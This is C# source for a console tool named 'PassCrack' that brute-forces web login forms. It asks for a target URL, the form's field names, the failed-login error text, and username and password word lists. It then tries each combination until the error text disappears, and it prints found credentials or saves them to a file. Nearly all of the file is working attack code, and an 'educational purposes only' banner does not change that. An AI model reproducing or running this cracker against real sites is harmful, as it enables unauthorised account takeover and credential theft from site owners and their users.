/** * User Setup For The Attack (eg. Target, Word list, etc..) */ public static void userSetup() { Console.Clear(); resetConfig(); //Called to display the tile of the program coolTitle(); Console.WriteLine("\n ** This program is for Educational Purposes Only **\n " + " ** I Will not be held accountable for any elicit use of this software **"); Console.WriteLine("\nWelcome to PassCrack, this is a program that allows a user to easily run word lists against web forms\n"); Console.WriteLine("Select A Form Type..."); Console.ForegroundColor = ConsoleColor.Cyan; Console.WriteLine("1) ASP/ASPX\n"); //Console.WriteLine("2) General POST Form\n"); //Console.WriteLine("3) General GET Form\n"); Console.ResetColor(); try { formType = Int32.Parse(getUserResponse("Select A Form Type (1-...): ")); } catch (Exception e) { } Console.ForegroundColor = ConsoleColor.Cyan; //Convert selected form to string for display switch (formType) { case 1: formTypeStr = "\"ASP/ASPX\""; break; case 2: formTypeStr = "\"General POST Form\""; break; case 3: formTypeStr = "\"General GET Form\""; break; default: formTypeStr = "\"General POST Form\""; break; } //Print what the selected form is Console.WriteLine(String.Format("You Selected: {0}\n", formTypeStr)); Console.ResetColor(); //Resolve the host name passed to an IP address, if host doesn't resolve tell the user the URL was bad and then restart try { host = UserInput.getUserResponse("Base URL To Login Page (eg. www.example.com): "); IPAddress testIp = null; if (!IPAddress.TryParse(host, out testIp)) { ip = (Dns.GetHostEntry(host).AddressList[0]).ToString(); } else { ip = host; } Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine(String.Format("Host name Resolved to {0}", ip)); Console.ResetColor(); } catch (Exception e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Invalid URL : " + e.Message); Console.ResetColor(); Thread.Sleep(3000); Console.Clear(); userSetup(); } //Add the attack URI to the resolved IP addOnPath = UserInput.getUserResponse("Input the add on path (eg /login/...): "); requestType = UserInput.getUserResponse("Input the request type (http/https if login form is https use https): "); //Combine the base URL and the full URI and confirm that it is correct fullPath = requestType + "://" + host + addOnPath; if (UserInput.getUserResponse(String.Format("Is this path correct: {0} (y/n): ", fullPath)) == "n") { Console.Clear(); userSetup(); } //Inform the user it is getting the response from the URL to verify that its not a 404 or something similar Console.ForegroundColor = ConsoleColor.Cyan; Console.WriteLine("Getting Response From URL..."); Console.ResetColor(); //Wrap block in try catch to avoid 404 errors try { //As well check the response length to see if it is greater than a certain character limit to verify that something was actually returned if (Requests.getResponse().Length > 20) { //If it is inform the user it most likely found a valid response Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Response Received!"); Console.ResetColor(); } //However for some strange reason if the character length was less than 20 inform the user and ask if they wish to see the response else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("An Unknown Error Occurred"); Console.ResetColor(); if (UserInput.getUserResponse("Would you like to see the response? (y/n): ") == "y") { Console.WriteLine(Requests.getResponse()); if (UserInput.getUserResponse("Would you like to continue if not? (y/n)") == "n") { Console.Clear(); userSetup(); } } else { Console.Clear(); userSetup(); } } } //If a 404 or similar exception was returned tell the user the exception and return to the menu catch (Exception e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Error Getting Response From Server: " + e.Message); Console.ResetColor(); Thread.Sleep(2000); Console.Clear(); userSetup(); } //Field names for the user name and password usernameField = UserInput.getUserResponse("Input the name of the user field on the form (unsaniztized): "); passwordField = UserInput.getUserResponse("Input the name of the password field on the form (unsaniztized): "); //The user selected a general post form if (formType == 2 || formType == 3) { rawFormVariables = UserInput.getUserResponse("Input Any Custom Parameters: "); customFormVariables = buildCustomOptions(rawFormVariables); cookies = getUserResponse("Input any cookies that need to be sent in the request (can be left blank): "); } //Ask the user for the invalid login response invalidPasswordText = UserInput.getUserResponse("Input the name of the error element ID: "); //Ask for a path to a password list and escape all back slashes wordListPath = sanitizePath(UserInput.getUserResponse("Path to password list file: ")); //Asks the user if they want to use a user list or a single user name if (UserInput.getUserResponse("Would you like to use a user list or a single user name? (list / single): ") == "list") { userListPath = sanitizePath(UserInput.getUserResponse("Path to user list file: ")); } //If 'list' isn't typed default to single else { username = UserInput.getUserResponse("User name: "); } //Set weather or not we will show the attempts if (UserInput.getUserResponse("Would you like to show attempts? (y/n): ") == "y") { showAttempts = true; } //Display the selected options printConfig(); //Confirm that the settings are correct and start the attack if (UserInput.getUserResponse("All configured settings values are listed above, are you sure you want to proceed? (y/n): ") == "y") { Cracker.beginAttack(); } //If not then reset else { Console.Clear(); userSetup(); } }
/** * Called to actually start attempting passwords */ public static void beginAttack() { //Load lists loadLists(); //Check if it is meant to be using a usernames and passwords list if (usernames.Count > 0) { //Foreach username foreach (string username in usernames) { //Iterate through all the possible passwords foreach (string password in passwords) { //If a match is found add it to the corresponding point in the array list that is in line with the user name if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText)) { foundPasswords.Add(password); passwordFound = true; break; } //If no password was found add no password found in the place instead to keep the list in line else { foundPasswords.Add("No Password Found"); } //As well, if showAttempts is set to true print out the fact that the attempt was invalid if (showAttempts == true) { Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password)); Console.ForegroundColor = ConsoleColor.Red; Console.Write("Incorrect\n"); Console.ResetColor(); } } } } //If the user selected to use a singular username else { //Only loop through each password in the list foreach (string password in passwords) { //If the correct password was found set teh correctUsername and correctPassword variables and break out of the loop if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText)) { passwordFound = true; correctPassword = password; correctUsername = username; break; } //Similar to above if showAttempts is true show the failed password attempt if (showAttempts == true) { Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password)); Console.ForegroundColor = ConsoleColor.Red; Console.Write("Incorrect\n"); Console.ResetColor(); } } } //After both loops are done and a password was found this block runs if (passwordFound == true) { //First it checks if we are using a singular user name if (username.Length > 0) { //If so change the text to green display "Password Found!!" and list the correct username and password Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Password Found!!"); Console.WriteLine(String.Format("Username: {0} Password: {1}", correctUsername, correctPassword)); Console.ResetColor(); //And make the user type return if they are done if they dont then exit the program on the next key press if (UserInput.getUserResponse("If you wish to return to the menu please type \"return\":") == "return") { Console.ReadKey(); UserInput.userSetup(); } else { Console.WriteLine("Press Any Key To Exit..."); Console.ReadKey(); } } //However if the user was running a username list then display each user name and password combo, and ask if they want to write it to a file else { Console.WriteLine("The Following List Of Passwords Was Found...\n"); for (int i = 0; i < foundPasswords.Count; i++) { if (foundPasswords[i] != "No Password Found") { Console.WriteLine(String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i])); } } //Asks the user if they want to output the password/username list to a file if (UserInput.getUserResponse("Would you like to output this list to a file? (y/n):") == "y") { //Ask where then generate a variable to then write to the file string outPath = UserInput.getUserResponse("Enter An Output Path: "); string output = ""; for (int i = 0; i < foundPasswords.Count; i++) { if (foundPasswords[i] != "No Password Found") { output += String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]) + "\n"; } } File.WriteAllText(outPath, output); } } } //If no passwords were found at all else { //Turn the text red and then wait for the user to press a key then exit Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("No Matches Found"); Console.ResetColor(); Console.WriteLine("Press Any Key To Exit..."); Console.ReadKey(); } }